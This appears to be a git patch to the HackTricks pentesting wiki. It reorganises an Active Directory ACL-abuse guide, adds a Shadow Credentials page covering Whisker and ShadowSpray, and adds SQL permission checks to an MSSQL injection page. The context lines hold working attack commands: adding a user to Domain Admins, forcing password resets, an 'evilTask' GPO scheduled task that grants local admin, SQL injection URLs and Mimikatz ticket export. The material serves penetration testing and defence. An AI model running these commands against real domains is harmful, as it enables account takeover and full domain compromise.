From bd0b87e02c34f2c9c10b180d6b6c0f2231c94e7f Mon Sep 17 00:00:00 2001
From: CPol
Date: Mon, 10 Oct 2022 21:08:59 +0000
Subject: [PATCH] GitBook: [#3592] No subject
---
 SUMMARY.md | 3 +-
 .../sql-injection/mssql-injection.md | 31 ++++-
 .../active-directory-methodology/README.md | 8 +-
 .../README.md} | 84 ++++++-------
 .../shadow-credentials.md | 111 ++++++++++++++++++
 .../unconstrained-delegation.md | 31 ++---
 .../powerview.md | 6 +-
 7 files changed, 205 insertions(+), 69 deletions(-)
 rename windows-hardening/active-directory-methodology/{acl-persistence-abuse.md => acl-persistence-abuse/README.md} (90%)
 create mode 100644 windows-hardening/active-directory-methodology/acl-persistence-abuse/shadow-credentials.md
diff --git a/SUMMARY.md b/SUMMARY.md
index 46c83ab39..6c349ffd0 100644
--- a/SUMMARY.md
+++ b/SUMMARY.md
@@ -161,7 +161,8 @@
 * [SeImpersonate from High To System](windows-hardening/windows-local-privilege-escalation/seimpersonate-from-high-to-system.md)
 * [Windows C Payloads](windows-hardening/windows-local-privilege-escalation/windows-c-payloads.md)
 * [Active Directory Methodology](windows-hardening/active-directory-methodology/README.md)
- * [Abusing Active Directory ACLs/ACEs](windows-hardening/active-directory-methodology/acl-persistence-abuse.md)
+ * [Abusing Active Directory ACLs/ACEs](windows-hardening/active-directory-methodology/acl-persistence-abuse/README.md)
+ * [Shadow Credentials](windows-hardening/active-directory-methodology/acl-persistence-abuse/shadow-credentials.md)
 * [AD Certificates](windows-hardening/active-directory-methodology/ad-certificates.md)
 * [AD CS Account Persistence](windows-hardening/active-directory-methodology/ad-certificates/account-persistence.md)
 * [AD CS Domain Escalation](windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md)
diff --git a/pentesting-web/sql-injection/mssql-injection.md b/pentesting-web/sql-injection/mssql-injection.md
index 0267259ec..bd0f0aa46 100644
--- a/pentesting-web/sql-injection/mssql-injection.md
+++ b/pentesting-web/sql-injection/mssql-injection.md
@@ -63,6 +63,14 @@ https://vuln.app/getItem?id= 1+and+exists(select+*+from+fn_xe_file_target_read_f **Permissions:** Requires **`VIEW SERVER STATE`** permission on the server. +```sql +# Check if you have it +SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='VIEW SERVER STATE'; +# Or doing +Use master; +EXEC sp_helprotect 'fn_xe_file_target_read_file'; +``` + ### `fn_get_audit_file` ```
@@ -73,6 +81,14 @@ https://vuln.app/getItem?id= 1%2b(select+1+where+exists(select+*+from+fn_get_aud **Permissions:** Requires the **`CONTROL SERVER`** permission. +```sql +# Check if you have it +SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='CONTROL SERVER'; +# Or doing +Use master; +EXEC sp_helprotect 'fn_get_audit_file'; +``` + ### `fn_trace_gettabe` ```
@@ -83,6 +99,14 @@ https://vuln.app/ getItem?id=1+and+exists(select+*+from+fn_trace_gettable('\\'%2 **Permissions:** Requires the **`CONTROL SERVER`** permission. +```sql +# Check if you have it +SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='CONTROL SERVER'; +# Or doing +Use master; +EXEC sp_helprotect 'fn_trace_gettabe'; +``` + ### `xp_dirtree`, `xp_fileexists`, `xp_subdirs` The most common method to make a network call yosqlu will come across using MSSQL is the usage of the Stored Procedure `xp_dirtree`, which weirdly is undocumented by Microsoft, which caused it to be [documented by other folks on the Internet](https://www.baronsoftware.com/Blog/sql-stored-procedures-get-folder-files/). This method has been used in [multiple examples](https://www.notsosecure.com/oob-exploitation-cheatsheet/) of [Out of Band Data exfiltration](https://gracefulsecurity.com/sql-injection-out-of-band-exploitation/) posts on the Internet.
@@ -135,7 +159,7 @@ public partial class UserDefinedFunctions In the installation instructions, run the following before the `CREATE ASSEMBLY` query to add the SHA512 hash of the assembly to the list of trusted assemblies on the server (you can see the list using `select * from sys.trusted_assemblies;`) -``` +```sql EXEC sp_add_trusted_assembly 0x35acf108139cdb825538daee61f8b6b07c29d03678a4f6b0a5dae41a2198cf64cefdb1346c38b537480eba426e5f892e8c8c13397d4066d4325bf587d09d0937,N'HttpDb, version=0.0.0.0, culture=neutral, publickeytoken=null, processorarchitecture=msil'; ```
@@ -181,6 +205,11 @@ https://vuln.app/getItem?id=-1%20union%20select%20null,(select+text+from+sys.dm_ **Permissions:** If the user has VIEW SERVER STATE permission on the server, the user will see all executing sessions on the instance of SQL Server; otherwise, the user will see only the current session. +```sql +# Check if you have it +SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='VIEW SERVER STATE'; +``` + ## **Little tricks for WAF bypasses** Non-standard whitespace characters: %C2%85 ΠΈΠ»ΠΈ %C2%A0:
diff --git a/windows-hardening/active-directory-methodology/README.md b/windows-hardening/active-directory-methodology/README.md
index c8477b7c3..d9751df4b 100644
--- a/windows-hardening/active-directory-methodology/README.md
+++ b/windows-hardening/active-directory-methodology/README.md
@@ -333,8 +333,8 @@ It's possible to gain code execution with **elevated privileges on a remote comp The compromised user could have some **interesting privileges over some domain objects** that could let you **move** laterally/**escalate** privileges. -{% content-ref url="acl-persistence-abuse.md" %} -[acl-persistence-abuse.md](acl-persistence-abuse.md) +{% content-ref url="acl-persistence-abuse/" %} +[acl-persistence-abuse](acl-persistence-abuse/) {% endcontent-ref %} ### Printer Spooler service abuse
@@ -465,8 +465,8 @@ There is a **local administrator** account inside each **DC**. Having admin priv You could **give** some **special permissions** to a **user** over some specific domain objects that will let the user **escalate privileges in the future**. -{% content-ref url="acl-persistence-abuse.md" %} -[acl-persistence-abuse.md](acl-persistence-abuse.md) +{% content-ref url="acl-persistence-abuse/" %} +[acl-persistence-abuse](acl-persistence-abuse/) {% endcontent-ref %} ### Security Descriptors
diff --git a/windows-hardening/active-directory-methodology/acl-persistence-abuse.md b/windows-hardening/active-directory-methodology/acl-persistence-abuse/README.md
similarity index 90%
rename from windows-hardening/active-directory-methodology/acl-persistence-abuse.md
rename to windows-hardening/active-directory-methodology/acl-persistence-abuse/README.md
index f36d8b5e5..2458ea547 100644
--- a/windows-hardening/active-directory-methodology/acl-persistence-abuse.md
+++ b/windows-hardening/active-directory-methodology/acl-persistence-abuse/README.md
@@ -12,8 +12,6 @@ -**This information was mostly copied from** [**https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces) **because it's just perfect** - ## Context This lab is to abuse weak permissions of Active Directory Discretionary Access Control Lists (DACLs) and Acccess Control Entries (ACEs) that make up DACLs.
@@ -22,7 +20,7 @@ Active Directory objects such as users and groups are securable objects and DACL An example of ACEs for the "Domain Admins" securable object can be seen here: -![](<../../.gitbook/assets/1 (1).png>) +![](<../../../.gitbook/assets/1 (1).png>) Some of the Active Directory object permissions and types that we as attackers are interested in:
@@ -48,7 +46,7 @@ Get-ObjectAcl -SamAccountName delegate -ResolveGUIDs | ? {$_.ActiveDirectoryRigh We can see that indeed our user `spotless` has the `GenericAll` rights, effectively enabling the attacker to take over the account: -![](../../.gitbook/assets/2.png) +![](../../../.gitbook/assets/2.png) * **Change password**: You could just change the password of that user with
@@ -83,7 +81,7 @@ Let's see if `Domain admins` group has any weak permissions. First of, let's get Get-NetGroup "domain admins" -FullData ``` -![](../../.gitbook/assets/4.png) +![](../../../.gitbook/assets/4.png) ```csharp Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq "CN=Domain Admins,CN=Users,DC=offense,DC=local"}
@@ -91,7 +89,7 @@ Get-NetGroup "domain admins" -FullData We can see that our attacking user `spotless` has `GenericAll` rights once again: -![](../../.gitbook/assets/5.png) +![](../../../.gitbook/assets/5.png) Effectively, this allows us to add ourselves (the user `spotless`) to the `Domain Admin` group:
@@ -99,7 +97,7 @@ Effectively, this allows us to add ourselves (the user `spotless`) to the `Domai net group "domain admins" spotless /add /domain ``` -![](../../.gitbook/assets/6.gif) +![](../../../.gitbook/assets/6.gif) Same could be achieved with Active Directory or PowerSploit module:
@@ -111,16 +109,21 @@ Add-ADGroupMember -Identity "domain admins" -Members spotless Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local" ``` -## GenericAll / GenericWrite / Write on Computer +## GenericAll / GenericWrite / Write on Computer/User -* If you have these privileges on a Computer object, you can pull [Kerberos **Resource-based Constrained Delegation**: Computer Object Take Over](resource-based-constrained-delegation.md) off. -* If you have these privs over a user, you +* If you have these privileges on a **Computer object**, you can pull [Kerberos **Resource-based Constrained Delegation**: Computer Object Take Over](../resource-based-constrained-delegation.md) off. +* If you have these privs over a user, you can use one of the [first methods explained in this page](./#genericall-on-user). +* Or, either you have it in a Computer or a user you can use **Shadow Credentials** to impersonate it: + +{% content-ref url="shadow-credentials.md" %} +[shadow-credentials.md](shadow-credentials.md) +{% endcontent-ref %} ## WriteProperty on Group If our controlled user has `WriteProperty` right on `All` objects for `Domain Admin` group: -![](../../.gitbook/assets/7.png) +![](../../../.gitbook/assets/7.png) We can again add ourselves to the `Domain Admins` group and escalate privileges: 
@@ -128,19 +131,19 @@ We can again add ourselves to the `Domain Admins` group and escalate privileges: net user spotless /domain; Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"; net user spotless /domain ``` -![](../../.gitbook/assets/8.png) +![](../../../.gitbook/assets/8.png) ## Self (Self-Membership) on Group Another privilege that enables the attacker adding themselves to a group: -![](../../.gitbook/assets/9.png) +![](../../../.gitbook/assets/9.png) ```csharp net user spotless /domain; Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"; net user spotless /domain ``` -![](../../.gitbook/assets/10.png) +![](../../../.gitbook/assets/10.png) ## WriteProperty (Self-Membership)
@@ -150,13 +153,13 @@ One more privilege that enables the attacker adding themselves to a group: Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq "CN=Domain Admins,CN=Users,DC=offense,DC=local" -and $_.IdentityReference -eq "OFFENSE\spotless"} ``` -![](../../.gitbook/assets/11.png) +![](../../../.gitbook/assets/11.png) ```csharp net group "domain admins" spotless /add /domain ``` -![](../../.gitbook/assets/12.png) +![](../../../.gitbook/assets/12.png) ## **ForceChangePassword**
@@ -166,7 +169,7 @@ If we have `ExtendedRight` on `User-Force-Change-Password` object type, we can r Get-ObjectAcl -SamAccountName delegate -ResolveGUIDs | ? {$_.IdentityReference -eq "OFFENSE\spotless"} ``` -![](../../.gitbook/assets/13.png) +![](../../../.gitbook/assets/13.png) Doing the same with powerview:
@@ -174,7 +177,7 @@ Doing the same with powerview: Set-DomainUserPassword -Identity delegate -Verbose ``` -![](../../.gitbook/assets/14.png) +![](../../../.gitbook/assets/14.png) Another method that does not require fiddling with password-secure-string conversion:
@@ -183,7 +186,7 @@ $c = Get-Credential Set-DomainUserPassword -Identity delegate -AccountPassword $c.Password -Verbose ``` -![](../../.gitbook/assets/15.png) +![](../../../.gitbook/assets/15.png) ...or a one liner if no interactive session is not available:
@@ -191,7 +194,7 @@ Set-DomainUserPassword -Identity delegate -AccountPassword $c.Password -Verbose Set-DomainUserPassword -Identity delegate -AccountPassword (ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose ``` -![](../../.gitbook/assets/16.png) +![](../../../.gitbook/assets/16.png) and one last way yo achieve this from linux:
@@ -210,7 +213,7 @@ More info: Note how before the attack the owner of `Domain Admins` is `Domain Admins`: -![](../../.gitbook/assets/17.png) +![](../../../.gitbook/assets/17.png) After the ACE enumeration, if we find that a user in our control has `WriteOwner` rights on `ObjectType:All`
@@ -218,7 +221,7 @@ After the ACE enumeration, if we find that a user in our control has `WriteOwner Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq "CN=Domain Admins,CN=Users,DC=offense,DC=local" -and $_.IdentityReference -eq "OFFENSE\spotless"} ``` -![](../../.gitbook/assets/18.png) +![](../../../.gitbook/assets/18.png) ...we can change the `Domain Admins` object's owner to our user, which in our case is `spotless`. Note that the SID specified with `-Identity` is the SID of the `Domain Admins` group:
@@ -228,7 +231,7 @@ Set-DomainObjectOwner -Identity S-1-5-21-2552734371-813931464-1050690807-512 -Ow Set-DomainObjectOwner -Identity Herman -OwnerIdentity nico ``` -![](../../.gitbook/assets/19.png) +![](../../../.gitbook/assets/19.png) ## GenericWrite on User
@@ -236,7 +239,7 @@ Set-DomainObjectOwner -Identity Herman -OwnerIdentity nico Get-ObjectAcl -ResolveGUIDs -SamAccountName delegate | ? {$_.IdentityReference -eq "OFFENSE\spotless"} ``` -![](../../.gitbook/assets/20.png) +![](../../../.gitbook/assets/20.png) `WriteProperty` on an `ObjectType`, which in this particular case is `Script-Path`, allows the attacker to overwrite the logon script path of the `delegate` user, which means that the next time, when the user `delegate` logs on, their system will execute our malicious script:
@@ -246,7 +249,7 @@ Set-ADObject -SamAccountName delegate -PropertyName scriptpath -PropertyValue "\ Below shows the user's ~~`delegate`~~ logon script field got updated in the AD: -![](../../.gitbook/assets/21.png) +![](../../../.gitbook/assets/21.png) ## GenericWrite on Group
@@ -268,7 +271,7 @@ Remove-DomainGroupMember -Credential $creds -Identity "Group Name" -Members 'use If you are the owner of a group, like I'm the owner of a `Test` AD group: -![](../../.gitbook/assets/22.png) +![](../../../.gitbook/assets/22.png) Which you can of course do through powershell:
@@ -276,13 +279,13 @@ Which you can of course do through powershell: ([ADSI]"LDAP://CN=test,CN=Users,DC=offense,DC=local").PSBase.get_ObjectSecurity().GetOwner([System.Security.Principal.NTAccount]).Value ``` -![](../../.gitbook/assets/23.png) +![](../../../.gitbook/assets/23.png) And you have a `WriteDACL` on that AD object: -![](../../.gitbook/assets/24.png) +![](../../../.gitbook/assets/24.png) -...you can give yourself [`GenericAll`](../../windows/active-directory-methodology/broken-reference/) privileges with a sprinkle of ADSI sorcery: +...you can give yourself [`GenericAll`](../../../windows/active-directory-methodology/broken-reference/) privileges with a sprinkle of ADSI sorcery: ```csharp $ADSI = [ADSI]"LDAP://CN=test,CN=Users,DC=offense,DC=local"
@@ -294,7 +297,7 @@ $ADSI.psbase.commitchanges() Which means you now fully control the AD object: -![](../../.gitbook/assets/25.png) +![](../../../.gitbook/assets/25.png) This effectively means that you can now add new users to the group.
@@ -308,18 +311,18 @@ $acl.AddAccessRule($ace) Set-Acl -Path $path -AclObject $acl ``` -![](../../.gitbook/assets/26.png) +![](../../../.gitbook/assets/26.png) ## **Replication on the domain (DCSync)** The **DCSync** permission implies having these permissions over the domain itself: **DS-Replication-Get-Changes**, **Replicating Directory Changes All** and **Replicating Directory Changes In Filtered Set**.\ -[**Learn more about the DCSync attack here.**](dcsync.md) +[**Learn more about the DCSync attack here.**](../dcsync.md) ## GPO Delegation Sometimes, certain users/groups may be delegated access to manage Group Policy Objects as is the case with `offense\spotless` user: -![](../../.gitbook/assets/a13.png) +![](../../../.gitbook/assets/a13.png) We can see this by leveraging PowerView like so:
@@ -329,13 +332,13 @@ Get-ObjectAcl -ResolveGUIDs | ? {$_.IdentityReference -eq "OFFENSE\spotless"} The below indicates that the user `offense\spotless` has **WriteProperty**, **WriteDacl**, **WriteOwner** privileges among a couple of others that are ripe for abuse: -![](../../.gitbook/assets/a14.png) +![](../../../.gitbook/assets/a14.png) ### Enumerate GPO Permissions We know the above ObjectDN from the above screenshot is referring to the `New Group Policy Object` GPO since the ObjectDN points to `CN=Policies` and also the `CN={DDC640FF-634A-4442-BC2E-C05EED132F0C}` which is the same in the GPO settings as highlighted below: -![](../../.gitbook/assets/a15.png) +![](../../../.gitbook/assets/a15.png) If we want to search for misconfigured GPOs specifically, we can chain multiple cmdlets from PowerSploit like so:
@@ -343,7 +346,7 @@ If we want to search for misconfigured GPOs specifically, we can chain multiple Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name} | ? {$_.IdentityReference -eq "OFFENSE\spotless"} ``` -![](../../.gitbook/assets/a16.png) +![](../../../.gitbook/assets/a16.png) **Computers with a Given Policy Applied**
@@ -353,7 +356,7 @@ We can now resolve the computer names the GPO `Misconfigured Policy` is applied Get-NetOU -GUID "{DDC640FF-634A-4442-BC2E-C05EED132F0C}" | % {Get-NetComputer -ADSpath $_} ``` -![](../../.gitbook/assets/a17.png) +![](../../../.gitbook/assets/a17.png) **Policies Applied to a Given Computer**
@@ -379,11 +382,11 @@ One of the ways to abuse this misconfiguration and get code execution is to crea New-GPOImmediateTask -TaskName evilTask -Command cmd -CommandArguments "/c net localgroup administrators spotless /add" -GPODisplayName "Misconfigured Policy" -Verbose -Force ``` -![](../../.gitbook/assets/a19.png) +![](../../../.gitbook/assets/a19.png) The above will add our user spotless to the local `administrators` group of the compromised box. Note how prior to the code execution the group does not contain user `spotless`: -![](../../.gitbook/assets/a20.png) +![](../../../.gitbook/assets/a20.png) ### GroupPolicy module **- Abuse GPO**
@@ -420,7 +423,7 @@ if you have access to the computer you can force it with `gpupdate /force` . If we observe the Scheduled Tasks of the `Misconfigured Policy` GPO, we can see our `evilTask` sitting there: -![](../../.gitbook/assets/a22.png) +![](../../../.gitbook/assets/a22.png) Below is the XML file that got created by `New-GPOImmediateTask` that represents our evil scheduled task in the GPO:
@@ -508,6 +511,7 @@ Additionally, we could think about leveraging logon/logoff scripts, using regist ## References +* Initially, this information was mostly copied from [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces) * [https://wald0.com/?p=112](https://wald0.com/?p=112) * [https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryrights?view=netframework-4.7.2](https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryrights?view=netframework-4.7.2) * [https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/](https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/)
diff --git a/windows-hardening/active-directory-methodology/acl-persistence-abuse/shadow-credentials.md b/windows-hardening/active-directory-methodology/acl-persistence-abuse/shadow-credentials.md
new file mode 100644
index 000000000..bf1e2a8cf
--- /dev/null
+++ b/windows-hardening/active-directory-methodology/acl-persistence-abuse/shadow-credentials.md
@@ -0,0 +1,111 @@
+# Shadow Credentials
+
+
+
+Support HackTricks and get benefits!
+
+* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
+
+
+## Intro
+
+Check the original post for [**all the information about this technique**](https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab).
+
+As **summary**: if you can write to the **msDS-KeyCredentialLink** property of a user/computer, you can retrieve the **NT hash of that object**.
+
+This is because you will be able to set **public-private key authentication credentials** for the object and use them to obtain a **special Service Ticket that contains its NTLM hash** inside the Privilege Attribute Certificate (PAC) in an encrypted NTLM\_SUPPLEMENTAL\_CREDENTIAL entity that you can decrypt.
+
+### Requirements
+
+This technique requires the following:
+
+* At least one Windows Server 2016 Domain Controller.
+* A digital certificate for Server Authentication installed on the Domain Controller.
+* Windows Server 2016 Functional Level in Active Directory.
+* Compromise an account with the delegated rights to write to the msDS-KeyCredentialLink attribute of the target object.
+
+## Abuse
+
+Abusing Key Trust for computer objects requires additional steps after obtaining a TGT and the NTLM hash for the account. There are generally two options:
+
+1. Forge an **RC4 silver ticket** to impersonate privileged users to the corresponding host.
+2. Use the TGT to call **S4U2Self** to impersonate **privileged users** to the corresponding host. This option requires modifying the obtained Service Ticket to include a service class in the service name.
+
+Key Trust abuse has the added benefit that it doesn’t delegate access to another account which could get compromised β€” it is **restricted to the private key generated by the attacker**. In addition, it doesn’t require creating a computer account that may be hard to clean up until privilege escalation is achieved.
+
+Whisker
+
+Alongside this post I am releasing a tool called β€œ [Whisker](https://github.com/eladshamir/Whisker) β€œ.
Based on code from Michael’s DSInternals, Whisker provides a C# wrapper for performing this attack on engagements. Whisker updates the target object using LDAP, while DSInternals allows updating objects using both LDAP and RPC with the Directory Replication Service (DRS) Remote Protocol.
+
+[Whisker](https://github.com/eladshamir/Whisker) has four functions:
+
+* Add β€” This function generates a public-private key pair and adds a new key credential to the target object as if the user enrolled to WHfB from a new device.
+* List β€” This function lists all the entries of the msDS-KeyCredentialLink attribute of the target object.
+* Remove β€” This function removes a key credential from the target object specified by a DeviceID GUID.
+* Clear β€” This function removes all the values from the msDS-KeyCredentialLink attribute of the target object. If the target object is legitimately using WHfB, it will break.
+
+## [Whisker](https://github.com/eladshamir/Whisker)
+
+Whisker is a C# tool for taking over Active Directory user and computer accounts by manipulating their `msDS-KeyCredentialLink` attribute, effectively adding "Shadow Credentials" to the target account.
+
+[**Whisker**](https://github.com/eladshamir/Whisker) has four functions:
+
+* **Add** β€” This function generates a public-private key pair and adds a new key credential to the target object as if the user enrolled to WHfB from a new device.
+* **List** β€” This function lists all the entries of the msDS-KeyCredentialLink attribute of the target object.
+* **Remove** β€” This function removes a key credential from the target object specified by a DeviceID GUID.
+* **Clear** β€” This function removes all the values from the msDS-KeyCredentialLink attribute of the target object. If the target object is legitimately using WHfB, it will break.
+
+### Add
+
+Add a new value to the **`msDS-KeyCredentialLink`** attribute of a target object:
+
+* `/target:`: Required. Set the target name.
Computer objects should end with a '$' sign.
+* `/domain:`: Optional. Set the target Fully Qualified Domain Name (FQDN). If not provided, will try to resolve the FQDN of the current user.
+* `/dc:`: Optional. Set the target Domain Controller (DC). If not provided, will try to target the Primary Domain Controller (PDC).
+* `/path:`: Optional. Set the path to store the generated self-signed certificate for authentication. If not provided, the certificate will be printed as a Base64 blob.
+* `/password:`: Optional. Set the password for the stored self-signed certificate. If not provided, a random password will be generated.
+
+Example: **`Whisker.exe add /target:computername$ /domain:constoso.local /dc:dc1.contoso.local /path:C:\path\to\file.pfx /password:P@ssword1`**
+
+{% hint style="info" %}
+More options on the [**Readme**](https://github.com/eladshamir/Whisker).
+{% endhint %}
+
+## [ShadowSpray](https://github.com/Dec0ne/ShadowSpray/)
+
+In several cases, the group "Everyone" / "Authenticated Users" / "Domain Users" or some other **wide group** contains almost all the users in the domain has some `GenericWrite`/`GenericAll` DACLs **over other objects** in the domain. [**ShadowSpray**](https://github.com/Dec0ne/ShadowSpray/) tries to **abuse** therefore **ShadowCredentials** over all of them
+
+It goes something like this:
+
+1. **Login** to the domain with the supplied credentials (Or use the current session).
+2. Check that the **domain functional level is 2016** (Otherwise stop since the Shadow Credentials attack won't work)
+3. Gather a **list of all the objects** in the domain (users and computers) from LDAP.
+4. **For every object** in the list do the following:
+ 1. Try to **add KeyCredential** to the object's `msDS-KeyCredentialLink` attribute.
+ 2. If the above is **successful**, use **PKINIT** to request a **TGT** using the added KeyCredential.
+ 3.
If the above is **successful**, perform an **UnPACTheHash** attack to reveal the user/computer **NT hash**.
+ 4. If **`--RestoreShadowCred`** was specified: Remove the added KeyCredential (clean up after yourself...)
+5. If **`--Recursive`** was specified: Do the **same process** using each of the user/computer **accounts we successfully owned**.
+
+## References
+
+* [https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab](https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab)
+* [https://github.com/eladshamir/Whisker](https://github.com/eladshamir/Whisker)
+* [https://github.com/Dec0ne/ShadowSpray/](https://github.com/Dec0ne/ShadowSpray/)
+
+
+Support HackTricks and get benefits!
+
+* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
+
diff --git a/windows-hardening/active-directory-methodology/unconstrained-delegation.md b/windows-hardening/active-directory-methodology/unconstrained-delegation.md
index 6319c4d0a..ae8502b25 100644
--- a/windows-hardening/active-directory-methodology/unconstrained-delegation.md
+++ b/windows-hardening/active-directory-methodology/unconstrained-delegation.md
@@ -4,15 +4,11 @@ Support HackTricks and get benefits!
-- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
+* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
@@ -29,7 +25,6 @@ You can **find Computer objects with this attribute** checking if the [userAccou Get-NetComputer -Unconstrained #DCs always appear but aren't useful for privesc ## ADSearch ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem - # Export tickets with Mimikatz privilege::debug sekurlsa::tickets /export #Recommended way
@@ -53,7 +48,7 @@ To make a print server login against any machine you can use [**SpoolSample**](h .\SpoolSample.exe ``` -If the TGT if from a domain controller, you could perform a[ **DCSync attack**](acl-persistence-abuse.md#dcsync) and obtain all the hashes from the DC.\ +If the TGT if from a domain controller, you could perform a[ **DCSync attack**](acl-persistence-abuse/#dcsync) and obtain all the hashes from the DC.\ [**More info about this attack in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-dc-print-server-and-kerberos-delegation) **Here are other ways to try to force an authentication:**
@@ -71,14 +66,10 @@ If the TGT if from a domain controller, you could perform a[ **DCSync attack**](
 Support HackTricks and get benefits!
-- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
+* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
